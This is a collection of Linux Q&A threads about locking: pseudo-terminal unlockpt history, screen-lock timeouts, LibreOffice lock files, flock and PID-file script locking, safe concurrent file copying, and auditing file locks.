The old AT&T System 5 mechanism for pseudo-terminal slave devices was that they were ordinary persistent character device nodes under /dev. There was a multiplexor master device at /dev/ptmx. The old 4.3BSD mechanism for pseudo-terminal devices had parallel pairs of ordinary persistent master and slave device nodes under /dev. In both cases, this meant that the slave device files retained their last ownership and permissions after last file descriptor closure. Hence the evolution of the grantpt() function to fix up the ownership and permissions of the slave device file after a (re-used) pseudo-terminal had been (re-)allocated. This in turn meant that there was a window when a program was setting up a re-used pseudo-terminal between the open() and the grantpt() where whoever had owned the slave device beforehand could sneak in and open it as well, potentially gaining access to someone else's terminal. Hence the idea of pseudo-terminal slave character devices starting in a locked state where they could not be opened and being unlocked by unlockpt() after the grantpt() had been successfully performed. Over the years, it turned out that this was unnecessary. Nowadays, the slave device files are not persistent, because the kernel makes and destroys things in /dev itself. The act of opening the master device either resets the slave device permissions and ownership, or outright creates the slave device file afresh (in the latter case with the slave device file disappearing again when all open file descriptors are closed), in either case atomically in the same system call. On OpenBSD, this is part of the PTMGET I/O control's functionality on the /dev/ptm device. /dev is still a disc volume, and the kernel internally issues the relevant calls to create new device nodes there and reset their ownerships and permissions. On FreeBSD, this is done by the posix_openpt() system call. /dev is not a disc volume at all. It is a devfs filesystem. It contains no "multiplexor" device nor master device files, because posix_openpt() is an outright system call, not an wrapped ioctl() on an open file descriptor. Slave devices appear in the devfs filesystem under its pts/ directory.The kernel thus ensures that they have the right permissions and ownership ab initio, and there is no window of opportunity where they have stale ones. Thus the grantpt() and unlockpt() library functions are essentially no-ops, whose sole remaining functionality is to check their passed file descriptor and set EINVAL if it isn't the master side of a pseudo-terminal, because programs might be doing daft things like passing non-pseudo-terminal file descriptors to these functions and expecting them to return errors. For a while on Linux, pseudo-terminal slave devices were persistent device nodes. The GNU C library's grantpt() wasn't a system call. Rather, it forked and executed a set-UID helper program named pt_chown, much to the dismay of the no set-UID executables crowd. (grantpt() has to allow an unprivileged user to change the ownership and permissions of a special device file that it does not necessarily own, remember.) So there was still the window of opportunity, and Linux still had to maintain a lock for unlockpt(). Its "new" devpts filesystem (where "new" means introduced quite a few years ago, now) almost permits the same way of doing things as on FreeBSD with devfs, however. There are some differences.There is still a "multiplexor" device. 
In the older "new" devpts system, this was a ptmx device in a different devtmpfs filesystem, with the devpts filesystem containing only the automatically created/destroyed slave device files. Conventionally the setup was /dev/ptmx and an accompanying devpts mount at /dev/pts. But Linux people wanted to have multiple wholly independent instances of the devpts filesystem, for containers and the like, and it turned out to be quite hard synchronizing the (correct) two filesystems when there were many devtmpfs and devpts filesystems. So in the newer "new" devpts system all of the devices, multiplexor and slave, are in the one filesystem. For backwards compatibility, the default was for the new ptmx node to be inaccessible unless one set a new ptmxmode mount option. In the even newer still "new" devpts the ptmx device file in the devpts filesystem is now the primary multiplexor, and the ptmx in the devtmpfs is either a shim provided by the kernel that tries to mimic a symbolic link, a bind mount, or a plain old actual symbolic link to pts/ptmx.The kernel does not always set up the ownership and permissions as grantpt() should. Setting the wrong mount options, either a gid other than the tty GID or a mode other than 0620, triggers fallback behaviour in the GNU C library. In order to reduce grantpt() to a no-operation in the GNU C library as desired, the kernel must not assign the group of the opening process (i.e. there must be an explicit gid setting), the group assigned must be the tty group, and the mode of newly created slave devices must be exactly 0620.Not switching on /dev/pts/ptmx by default and the GNU C library not wholly reducing grantpt() to a no-op are both because the kernel and the C library are not maintained in lockstep. Each had to operate with older versions of the other. Linux still had to provide an older /dev/ptmx. The GNU C library still has to fall back to running pt_chown if there's not a new devpts filesystem with the correct mount options in place. The window of opportunity thus still exists for unlockpt() to guard against on Linux, if the devpts mount options are wrong and the GNU C library consequently has to fall back to actually doing something in grantpt(). Further readinghttps://unix.stackexchange.com/a/470853/5132 What would be the best way to work around this glibc problem? https://unix.stackexchange.com/a/214685/5132 Documentation/filesystems/devpts.txt. Linux kernel. Daniel Berrange (2009-05-20). /dev/pts must use the 'newinstance' mount flag to avoid security problem with containers. RedHat bug #501718. Jonathan de Boyne Pollard (2018). open-controlling-tty. nosh Guide. Softwares. Jonathan de Boyne Pollard (2018). vc-get-tty. nosh Guide. Softwares. Jonathan de Boyne Pollard (2018). pty-get-tty. nosh Guide. Softwares.
After having opened the master part of a pseudo-terminal

int fd_pseudo_term_master = open("/dev/ptmx",O_RDWR);

the file /dev/pts/[NUMBER] is created, representing the slave part of the pseudo-terminal. Ignorant persons like me might imagine that after having done

ptsname(fd_pseudo_term_master,filename_pseudo_term_slave,buflen);

one should be set to simply do

int fd_pseudo_term_slave = open(filename_pseudo_term_slave,O_RDWR);

and be good. However, there must be a very important use case for "locked" pseudo-terminal slaves, since instead of keeping things simple, before the open call can be made, it is made necessary to use man 3 unlockpt to "unlock" it. I was not able to find out what this use case is. What is the need for the pseudo-terminal to be initially locked? What is achieved with code (taken from a libc) like

/* Unlock the slave pseudo terminal associated with the master pseudo
   terminal specified by FD.  */
int unlockpt (int fd)
{
#ifdef TIOCSPTLCK
  int save_errno = errno;
  int unlock = 0;

  if (ioctl (fd, TIOCSPTLCK, &unlock))
    {
      if (errno == EINVAL)
        {
          errno = save_errno;
          return 0;
        }
      else
        return -1;
    }
#endif
  /* If we have no TIOCSPTLCK ioctl, all slave pseudo terminals are
     unlocked by default.  */
  return 0;
}

If possible, an answer would detail a use case, historical or current. A bonus part of the question would be: do current Linux kernels still rely on this functionality of "locked pseudo terminal slaves"?

Idea: Is this an inefficient attempt to avoid race conditions? While waiting for an answer I have looked more into the Linux kernel source without finding a good answer myself. However, it appears that one use that can be extracted from an initial lockdown of the pseudo-terminal is to provide some time for the pseudo-terminal master process to set up access rights on the file at /dev/pts/[NUMBER], so as to prevent some user from accessing the file in the first place. Can this be part of the answer? Strangely, however, it appears that such an "initial lockdown" state is not really able to prevent multiple openings of the slave file anyway, at least with respect to what I conceive to be guaranteed atomicity here.
Is pseudo terminals ( unlockpt / TIOCSPTLCK ) a security feature?
To answer part 1), add the no-fork option to blurlock as below:

exec --no-startup-id xautolock -time 5 -locker 'blurlock -n' -notify 15 -notifier "notify-send 'Screen will lock in 15 s'" -detectsleep -killtime 60 -killer "systemctl suspend"

As blurlock is built on top of i3lock, this will pass the following option (according to the i3lock man page):

-n, --nofork
    Don't fork after starting.

Which I find rather cryptic, and wouldn't have figured out myself if not for a similar question on the Arch forum.
I'm using Manjaro (5.8.18-1-MANJARO) and the i3 window manager. I'm trying to lock the screen and then suspend activity after given amounts of idle time. I've found that xautolock should suit my needs using both the -locker and -killer flags. My i3 config contains the following:

exec --no-startup-id xautolock -time 5 -locker blurlock -notify 15 -notifier "notify-send 'Screen will lock in 15 s'" -detectsleep -killtime 60 -killer "systemctl suspend"

However, this doesn't seem to work:

The locker part works fine, but the system doesn't suspend after 60 minutes.
If I suspend the system manually (I'm using a modified version of the i3exit script; the executed command is xautolock -locknow && systemctl suspend), then the system suspends again shortly after I resume it.

This behavior started very recently, I think after a system update, and I don't think I've changed anything other than i3exit myself in system settings / config. I don't know what could be putting the system to sleep again since I don't have any power manager activated to my knowledge. Thanks for your help!
Trying to use xautolock to suspend activity after a certain amount of time
I solved this by adding /etc/X11/xorg.conf.d/30-dpms.conf which contains:

Section "ServerFlags"
    Option "StandbyTime" "90"
    Option "SuspendTime" "90"
    Option "OffTime" "90"
    Option "BlankTime" "90"
EndSection

90 stands for 90 minutes.
I use arch with i3wm. I have enabled i3lock in my .config/i3/config: exec --no-startup-id xss-lock --transfer-sleep-lock -- i3lockProblem is my computer locks like every 10 minutes. How can I set two hours lock timeout ? This is my xset q output: Keyboard Control: auto repeat: on key click percent: 0 LED mask: 00000000 XKB indicators: 00: Caps Lock: off 01: Num Lock: off 02: Scroll Lock: off 03: Compose: off 04: Kana: off 05: Sleep: off 06: Suspend: off 07: Mute: off 08: Misc: off 09: Mail: off 10: Charging: off 11: Shift Lock: off 12: Group 2: off 13: Mouse Keys: off auto repeat delay: 660 repeat rate: 25 auto repeating keys: 00ffffffdffffbbf fadfffefffedffff 9fffffffffffffff fff7ffffffffffff bell percent: 50 bell pitch: 400 bell duration: 100 Pointer Control: acceleration: 2/1 threshold: 4 Screen Saver: prefer blanking: yes allow exposures: yes timeout: 600 cycle: 600 Colors: default colormap: 0x22 BlackPixel: 0x0 WhitePixel: 0xffffff Font Path: /usr/share/fonts/misc,/usr/share/fonts/TTF,/usr/share/fonts/OTF,/usr/share/fonts/100dpi,/usr/share/fonts/75dpi,built-ins DPMS (Energy Star): Standby: 600 Suspend: 600 Off: 600 DPMS is Enabled Monitor is On
Arch linux: i3wm set lock time out (xss-lock i3lock)
The leading dot hides the file from some directory listings. This comes from historical behavior of the ls command, which led many programs to use leading dots to denote files that aren't meant to be visible in directory listings, which in turn led to many file managers hiding such files by default.

The tilde is an unusual character in file names, so there's not much risk of colliding with a file name chosen by the user. Why a tilde? Tildes are especially unusual at the beginning of file names, because a leading ~ means “home directory” in shells and many other programs. So prepending a tilde is unlikely to cause a collision. A possible additional factor is that a tilde at the end of a file name is a traditional way to name backups, so adding a tilde to a file's name has a flavor of “some file that is related to this other file, but is not the one the user usually wants” (but it couldn't go at the end because that position is already taken). The tilde may additionally have been inspired by the lock files used by Microsoft Office, which start with ~$.

The hash at the end ensures that the file doesn't have an extension that other programs would recognize. If the file was called .~lock.MyDocument.odt, file managers would offer to open it in LibreOffice. Why a hash rather than some other character? Hash has a small tradition of being used in lock file names; for example, Emacs uses .# followed by the name of the file that's being edited.
Whenever I open a LibreOffice document, LibreOffice creates a lock file alongside the original file. This file has a naming scheme like the following:

.~lock.MyDocument.odt#

Is this a LibreOffice-specific naming pattern? Is it common on Linux? Why does LibreOffice use exactly that pattern? Why did they choose those specific extra characters?
Lock file naming pattern
Alright, so:

In a terminal, open /etc/default/grub.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT=.
Replace it with GRUB_CMDLINE_LINUX_DEFAULT="atkbd.reset i8042.reset i8042.nomux quiet splash".
Save and exit the file.
Run sudo update-grub.

If this doesn't work, follow the same process but try GRUB_CMDLINE_LINUX_DEFAULT="i8042.direct i8042.dumbkbd" instead.
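Before rebooting, you can confirm the edit took effect with the same grep the questioner uses below, then regenerate the grub config:

# Verify the edited kernel command line, then update grub.
grep "GRUB_CMDLINE_LINUX_DEFAULT=" /etc/default/grub
sudo update-grub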
I have a Dell Latitude 5500 and a Dell Latitude 7550. The 5500 has Debian 10 and KDE, and the 7550 has Ubuntu 20.04 with KDE. In both laptops, if I close the lid, when I open it later the built-in laptop keyboard is completely locked-up and I can't type anything. The trackpad still works though and I am able to click on "switch user". When I do this and get prompted to login again, the laptop keyboard starts working again on both laptops. I'm not sure if this is an issue, but I have an external 10-port USB hub plugged into the laptops. I have an external keyboard and mouse plugged into them. The external keyboard also locks up, but the external mouse also works. Why would closing the laptop lid cause the keyboard to lock up? Is there anything I can do to fix it? dmesg output: [Sat Jun 26 10:46:51 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Sat Jun 26 10:46:51 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Sat Jun 26 10:46:51 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 10:46:52 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 23:15:15 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Sat Jun 26 23:15:15 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Sat Jun 26 23:15:15 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 23:15:16 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 01:54:59 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Mon Jun 28 01:54:59 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Mon Jun 28 01:54:59 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 01:54:59 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 07:34:57 2021] usb 2-1: USB disconnect, device number 2 [Mon Jun 28 07:34:57 2021] usb 2-1.3: USB disconnect, device number 4 [Mon Jun 28 07:34:57 2021] usb 2-1.4: USB disconnect, device number 5 [Mon Jun 28 07:34:57 2021] usb 1-1: USB disconnect, device number 2 [Mon Jun 28 07:34:57 2021] usb 1-1.2: USB disconnect, device number 4 [Mon Jun 28 07:34:57 2021] usb 1-1.3: USB disconnect, device number 6 [Mon Jun 28 07:34:57 2021] usb 1-1.3.2: USB disconnect, device number 8 [Mon Jun 28 07:34:57 2021] usb 1-1.3.4: USB disconnect, device number 9 [Mon Jun 28 07:34:57 2021] usb 1-1.4: USB disconnect, device number 7 [Mon Jun 28 07:35:06 2021] usb 1-1: new high-speed USB device number 10 using xhci_hcd [Mon Jun 28 07:35:06 2021] usb 1-1: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:06 2021] usb 1-1: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:06 2021] usb 1-1: Product: USB2.0 Hub [Mon Jun 28 07:35:06 2021] hub 1-1:1.0: USB hub found [Mon Jun 28 07:35:06 2021] hub 1-1:1.0: 4 ports detected [Mon Jun 28 07:35:06 2021] usb 2-1: new SuperSpeed Gen 1 USB device number 11 using xhci_hcd [Mon Jun 28 07:35:06 2021] usb 2-1: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:06 2021] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:06 2021] usb 2-1: Product: USB3.0 Hub [Mon Jun 28 07:35:06 2021] usb 2-1: Manufacturer: VIA Labs, Inc. 
[Mon Jun 28 07:35:06 2021] hub 2-1:1.0: USB hub found [Mon Jun 28 07:35:06 2021] hub 2-1:1.0: 4 ports detected [Mon Jun 28 07:35:06 2021] usb 1-1.2: new full-speed USB device number 11 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.3: new SuperSpeed Gen 1 USB device number 12 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.3: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:07 2021] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 2-1.3: Product: USB3.0 Hub [Mon Jun 28 07:35:07 2021] usb 2-1.3: Manufacturer: VIA Labs, Inc. [Mon Jun 28 07:35:07 2021] hub 2-1.3:1.0: USB hub found [Mon Jun 28 07:35:07 2021] hub 2-1.3:1.0: 4 ports detected [Mon Jun 28 07:35:07 2021] usb 1-1.2: New USB device found, idVendor=046d, idProduct=0a8f, bcdDevice= 0.12 [Mon Jun 28 07:35:07 2021] usb 1-1.2: New USB device strings: Mfr=3, Product=1, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 1-1.2: Product: Logitech USB Headset [Mon Jun 28 07:35:07 2021] usb 1-1.2: Manufacturer: Logitech USB Headset [Mon Jun 28 07:35:07 2021] usb 2-1.4: new SuperSpeed Gen 1 USB device number 13 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.4: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:07 2021] usb 2-1.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 2-1.4: Product: USB3.0 Hub [Mon Jun 28 07:35:07 2021] usb 2-1.4: Manufacturer: VIA Labs, Inc. [Mon Jun 28 07:35:07 2021] hub 2-1.4:1.0: USB hub found [Mon Jun 28 07:35:07 2021] hub 2-1.4:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] input: Logitech USB Headset Logitech USB Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.2/1-1.2:1.3/0003:046D:0A8F.0007/input/input34 [Mon Jun 28 07:35:08 2021] hid-generic 0003:046D:0A8F.0007: input,hidraw1: USB HID v1.11 Device [Logitech USB Headset Logitech USB Headset] on usb-0000:00:14.0-1.2/input3 [Mon Jun 28 07:35:08 2021] usb 1-1.3: new high-speed USB device number 12 using xhci_hcd [Mon Jun 28 07:35:08 2021] usb 1-1.3: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:08 2021] usb 1-1.3: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:08 2021] usb 1-1.3: Product: USB2.0 Hub [Mon Jun 28 07:35:08 2021] hub 1-1.3:1.0: USB hub found [Mon Jun 28 07:35:08 2021] hub 1-1.3:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] usb 1-1.4: new high-speed USB device number 13 using xhci_hcd [Mon Jun 28 07:35:08 2021] usb 1-1.4: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:08 2021] usb 1-1.4: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:08 2021] usb 1-1.4: Product: USB2.0 Hub [Mon Jun 28 07:35:08 2021] hub 1-1.4:1.0: USB hub found [Mon Jun 28 07:35:08 2021] hub 1-1.4:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] usb 1-1.3.2: new low-speed USB device number 14 using xhci_hcd [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: New USB device found, idVendor=046d, idProduct=c00e, bcdDevice=11.10 [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: Product: USB-PS/2 Optical Mouse [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: Manufacturer: Logitech [Mon Jun 28 07:35:09 2021] input: Logitech USB-PS/2 Optical Mouse as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.2/1-1.3.2:1.0/0003:046D:C00E.0008/input/input35 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C00E.0008: 
input,hidraw2: USB HID v1.10 Mouse [Logitech USB-PS/2 Optical Mouse] on usb-0000:00:14.0-1.3.2/input0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: new low-speed USB device number 15 using xhci_hcd [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice=64.02 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: Product: USB Keyboard [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: Manufacturer: Logitech [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.0/0003:046D:C31C.0009/input/input36 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C31C.0009: input,hidraw3: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1.3.4/input0 [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard Consumer Control as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.1/0003:046D:C31C.000A/input/input37 [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard System Control as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.1/0003:046D:C31C.000A/input/input38 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C31C.000A: input,hiddev0,hidraw4: USB HID v1.10 Device [Logitech USB Keyboard] on usb-0000:00:14.0-1.3.4/input1 [Mon Jun 28 07:35:25 2021] kscreen_backend[162047]: segfault at 10 ip 00007fdb6825df6b sp 00007ffd034223b0 error 4 in KSC_XRandR.so[7fdb68246000+1b000] [Mon Jun 28 07:35:25 2021] Code: 73 1c e8 58 97 fe ff 49 8b 3c 24 48 8d 73 14 e8 eb 96 fe ff 49 8b 3c 24 48 8d 73 24 e8 2e 93 fe ff e8 e9 b9 fe ff 49 8b 3c 24 <0f> b7 70 10 48 89 c5 e8 d9 92 fe ff 48 89 ef e8 e1 8f fe ff 4c 89Output of grep "GRUB_CMDLINE_LINUX_DEFAULT=" /etc/default/grub GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
laptop keyboard locks up after closing lid
While creating a lock can be done with the lockfile command, the flock system call, or by creating a directory (directory creation is an atomic operation), the second part is trickier: if the lock already exists, how do you determine whether it still belongs to a running process? The most common solution is to put the PID of the owning process into the lock file. Before trying to create a lock, check whether the lock file already exists. If it does, check whether the recorded PID matches a running process that looks like the one that should hold the lock. If it does not, remove the stale lock and recreate it.
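A minimal sketch of that check in shell, assuming the lock is a directory containing a pid file and that any stale owner ran as the same user (kill -0 only tells you that some process with that PID exists, which could in principle be a recycled PID, and there is still a tiny race window between removing a stale lock and re-taking it):
lockdir=/var/tmp/myjob.lock
pidfile="$lockdir/pid"
if mkdir "$lockdir" 2>/dev/null; then
    echo "$$" > "$pidfile"                        # we own the lock now
    trap 'rm -rf "$lockdir"' EXIT
elif oldpid=$(cat "$pidfile" 2>/dev/null) && kill -0 "$oldpid" 2>/dev/null; then
    echo "already running as PID $oldpid" >&2     # live owner, back off
    exit 1
else
    rm -rf "$lockdir"                             # stale lock: owner is gone
    mkdir "$lockdir" && echo "$$" > "$pidfile"
    trap 'rm -rf "$lockdir"' EXIT
fi
# ... long-running work here ...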
I want to write a long-running shell script so that only one copy could be run at a time. If the script crashes, I want a new invocation of the script not to be stopped by a lock from the crashed invocation. Is lockfile-* set of utils the right thing to use? Is there a chance of a race condition while using them in a script? Does --use-pid lift the 5-minutes limitation mentioned on the man page? My scripts run significantly longer. I use an Ubuntu 10.10 instance on Amazon EC2; no NFS or something like that.
Locking in a shell script
You can close the file descriptor where flock maintains the lock before running the program that you want to run unlocked.
(
  flock -n 9 || exit 120
  …
  (exec 9>&-; tomcat &)
) 9>/var/run/my.lock
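If your flock binary comes from util-linux, it may also offer an -o/--close option that does this for you: the lock's file descriptor is closed before the command runs, so the command and anything it spawns do not inherit it, while the lock itself is still held for the duration. Check flock(1) on your system; a sketch, with deploy.sh standing in for your deployment script:
flock -n --close /var/run/my.lock ./deploy.sh || exit 120
With this, a restarted Tomcat started from inside the script will not keep the lock open after the deployment finishes.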
I have a bash deployment script that handles deploying updated code to a Tomcat instance on CentOS, however, both Chef and RunDeck may invoke the script, and since Chef runs periodically there is a chance of a collision. How do I prevent the deployment script from running twice concurrently? The standard answer looks to be to wrap the deploy logic in a flock. However, since the deploy restarts tomcat that isn't working -- the new java process inherits the lock and prevents any further deploy scripts from executing. Is there another way to prevent concurrent execution or a way to prevent flock inheritance?
Controlling bash script concurrency, flock inheritance
I think the best thing to do is to ensure that process B only copies files which have been fully transferred by process A. One way to do this would be to use a combination of cp and mv in process A, since mv uses the rename system call (provided the files are on the same filesystem), which is atomic. This means that from the perspective of process B, the files appear in their fully formed state. One way to implement this would be to have a partial directory inside your /backup directory which is ignored by process B. For process A you could do something like:
file="some_wal_file"
cp pg_xlog/"$file" /backup/partial
mv /backup/partial/"$file" /backup
And for process B (using bash):
shopt -s extglob
scp /backup/!(partial) user@remote-machine:/backups/
Although the program that you probably want to look into, both for process A and process B, is rsync. rsync creates partial files and atomically moves them into place by default (although usually the partial files are hidden files rather than being kept in a specific directory). rsync will also avoid transferring files that it doesn't need to, and it has a special delta algorithm for transferring only the relevant parts of files that need to be updated over the network (rsync must be installed in both locations, although transfers still go over ssh by default). Using rsync for process A:
rsync -a --partial-dir=/backup/partial pg_xlog/some_wal_file /backup/
For process B:
rsync -a --exclude=/partial/ /backup/ user@remote-machine:/backups/
If process A copies files to some location loc and process B regularly copies the files from loc to some other location, can B read a file that is currently in the process of being copied to loc by A? I'm using Ubuntu Linux 12.04 if that's important.Background information: I want to continuously backup a PostgreSQL cluster. PostgreSQL provides WAL archiving for that. It works by having the database call a script that copies a completed WAL file to some backup location. I want another process to regularly copy the backed up WAL files to another server. If a WAL file is currently being copied by the database, can the second process still read the file without running into some EOF condition before the file is copied as a whole? In other words: Can I do the following with no synchronization between A and B? A B cp pg_xlog/some_wal_file /backup/ scp /backup/* user@remote-machine:/backups/
Can I safely read a file that is appended to by another process?
Unfortunately I cannot give you a straight answer, but I can point you in the right direction. Essentially you are looking for the place where Xfce stores its settings, and then a way to change one of those settings (enable/disable screen lock) from the command line instead of clicking through the GUI. Xfce uses xfconf for its settings (managed by the xfconfd daemon). The xfconf-query command should help you find the right setting and change it. See the xfconf and xfconf-query documentation.
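A rough sketch of how that exploration might look. The channel and property names below are guesses, not verified settings; use the listing commands first to find the real names on your system:
xfconf-query -l                            # list all channels
xfconf-query -c xfce4-screensaver -lv      # list properties and current values in one channel
xfconf-query -c xfce4-screensaver -p /lock/enabled -s false    # hypothetical property path
The xfce4-power-manager channel may also hold lock-on-suspend style settings worth checking.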
Please do NOT tell me how to lock the screen, I know how to do it. How do I enable/disable the Lock Screen service from the terminal? It looks like it's using xflock4 for locking the screen. I can enable or disable it in the Screensaver preferences, but I want to do it with a keyboard button. I don't need a shell script, just the command with which I can enable or disable it. I have Gentoo Linux, Xfce 4.16. Thank you!
How To enable/disable "Lock Screen" setting from Linux terminal?
I used the following function in my script to accomplish this:
getPIDLock () {
    if [ ! -e "$1" ]; then
        return 0    # Not an error, but lsof will emit a lot of text if the file doesn't exist
    fi
    # lsof -F p prints the owning PID prefixed with "p", e.g. "p1234"
    local PIDLock=$( lsof -F p "$1" | head -n 1 )
    local strEcho='echo ${PID:1}'
    bash -c "PID=\"$PIDLock\";$strEcho;"    # Assuming the system has bash, but not that the default shell is bash
    return 0
}
This will emit a PID if the file in question has a lock on it; otherwise, it will emit a blank string.
PID=$( getPIDLock "/path/to/pidfile" )
if [ -n "$PID" ]; then
    :    # Do your thing
fi
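Where lslocks (from util-linux) is available, you can sketch the same check without parsing lsof output. This assumes the path contains no whitespace, and the path itself is just a placeholder:
PID=$( lslocks -n -o PID,PATH | awk -v f="/path/to/pidfile" '$2 == f {print $1; exit}' )
lslocks reports both POSIX and flock-style locks, which matches the situation described in the question.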
I am trying to create a service wrapper (init.d script) around one of my favorite applications. The application creates both a PID and a lock file, and so I'm trying to use those to ensure that I can report accurate status of the application and prevent my service from starting multiple copies. Unfortunately, the application (or system) crashes from time to time, leaving the PID and lock files behind, so I can't just check for the existence of those files to determine if my application is running or not. The application does create a lock on the lock file, a POSIX WRITE lock, according to lslocks, but it seems that if I try to create a lock with flock -x -n "$file" echo dummy, the command succeeds, to my surprise. Deleting the file also succeeded (rm "$file"), as well as writing to it, which on a BTRFS system does make a small amount of sense, though doesn't make it any less aggravating. So, how can I query the file in such a way that I would know if the file has a lock (POSIX or FLOCK) on it or not?
Check and Test Lock from other Process
In a word, "no" :-) Linux tar will not stop any other process from reading the files while it is running. If you are concerned about writing, tar doesn't block that either; but if a file changes while tar is reading it, you'll get a warning message ("file changed as we read it"), and if the directory structure changes while tar is in the middle of it, you might see some oddities in the results (missing files, files duplicated on both paths, etc.). So reads are perfectly safe; writes may require a little more care.
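If you want a little extra confidence, GNU tar can compare the finished archive against the filesystem afterwards; any file that changed mid-archive shows up as a difference. A sketch, with placeholder paths:
tar -C /var/www -cf /tmp/images.tar images
tar -C /var/www -df /tmp/images.tar    # -d/--compare reports members that differ from what is now on disk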
I have a large (>10GB) folder full of images on a live webserver that I need to back up and transfer. I'm worried that if I tar the folder, the files will be blocked for reading by the webserver, which is hitting the files many times per second. Does the tar command in linux block the files it's working on from being read?
Does linux tar block write access to files
There is no file locking mechanism in place to protect file renaming or deletion because there is no need for one. Renaming or even deleting a file while it is open in another process, even one actively writing and/or reading data, is harmless. A process that has the file open sees no difference: it keeps accessing the data of the renamed file transparently, and can even keep using a "deleted" file without noticing the deletion. The actual removal of the data only happens once the last process holding the file open closes it or exits.
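You can see this for yourself with a throwaway shell demo (the file name logfile is just an example, nothing here is specific to the cron setup in the question):
exec 3>>logfile            # writer holds an open descriptor on the file
echo "before rename" >&3
mv logfile logfile.old     # rename while it is still open
echo "after rename" >&3    # this line still lands in logfile.old
exec 3>&-
cat logfile.old            # shows both lines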
I have a cron job that kicks off a new process every day. The process runs every 5 minutes and appends to a log file. Another cron job runs every 60 minutes. It takes some of the data in the log file, cleans it up, creates a new log file. This cleaned up log file gets imported into a database. MySQL prevents duplicate entries so the first few lines of each new clean log file gets ignored. At the end of a day, I'm stuck with 24 cleaned up log files and one raw log file. If I was to run the clean-up script by first renaming the file to pre-process, do what I need to do, then delete it, would it cause any issues with my first cron script that is logging to the same file every 5 minutes? My fear is that the original log file is being written to and this other cron task is trying to rename it. OS: Debian 8 Edit: Interesting. Cron will write to the renamed file.
Does linux have file locking protection when trying to rename/deleting files
In Parted Magic 2013.08.01, right-click an empty spot on the Desktop and select Lock Screen. The password is: partedmagic
Is it possible to lock the Parted Magic screen so that others don't tamper with it while it's in the middle of long operations?
Lock Parted Magic?
I haven't checked that it will get you exactly what you want, but the first thing I'd try is the audit subsystem. Make sure that the auditd daemon is started, then use auditctl to configure what you want to log. For ordinary filesystem accesses, you would do
auditctl -w /path/to/directory
auditctl -a exit,always -S fcntl -S open -S flock -F dir=/path/to/directory
The -S option can be used to restrict the logging to specific syscalls. The logs appear in /var/log/audit/audit.log on Debian, and probably on Fedora as well. If you do know which process(es) may lock the file, then consider running strace on these processes (and only looking at the file-related system calls, or further restricting to specific syscalls).
strace -s9999 -o foo.strace -e file foo
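If you add a key to the watch rule, pulling the matching events back out of the log is easier with ausearch. This assumes the audit userspace tools are installed, and the key name dirwatch is arbitrary:
auditctl -w /path/to/directory -p rwa -k dirwatch
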